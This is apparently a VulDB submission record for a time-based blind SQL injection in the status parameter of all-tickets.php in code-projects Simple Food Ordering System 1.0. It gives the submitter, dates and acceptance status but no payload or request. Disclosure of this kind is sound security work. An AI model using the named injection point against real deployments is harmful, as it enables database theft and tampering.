| Title | code-projects Simple Food Ordering System in PHP 1.0 SQL Injection |
|---|
| Description | The Simple Food Ordering System in PHP is vulnerable to a Time-Based Blind SQL Injection through the status parameter in the all-tickets.php endpoint.
The application fails to properly validate and sanitize user-supplied input before incorporating it into SQL queries. Because of this, an attacker can inject malicious SQL statements into the status parameter. By using time-delay functions such as SLEEP(), attackers can confirm the presence of SQL injection and potentially extract sensitive information from the backend database.
The vulnerability can be triggered by sending a specially crafted HTTP request containing a time-based SQL payload. When the payload is processed by the application, the database executes the injected SLEEP() command, causing the server response to be delayed. This delay confirms that the SQL query is being executed without proper input validation.
Successful exploitation of this vulnerability could allow attackers to enumerate the database structure, extract sensitive information, bypass authentication mechanisms, and manipulate database contents |
|---|
| Source | ⚠️ https://github.com/ahmadmarz10-hub/CVEsMarz/blob/main/SQL%20Injection%20(Time-Based%20Blind)Simple%20Food%20Ordering%20System%20in%20PHP.md?plain=1 |
|---|
| User | AhmadMarzouk (UID 95993) |
|---|
| Submission | 03/07/2026 00:19 (2 months ago) |
|---|
| Moderation | 03/21/2026 09:03 (14 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 352321 [code-projects Simple Food Ordering System 1.0 all-tickets.php Status sql injection] |
|---|
| Points | 20 |
|---|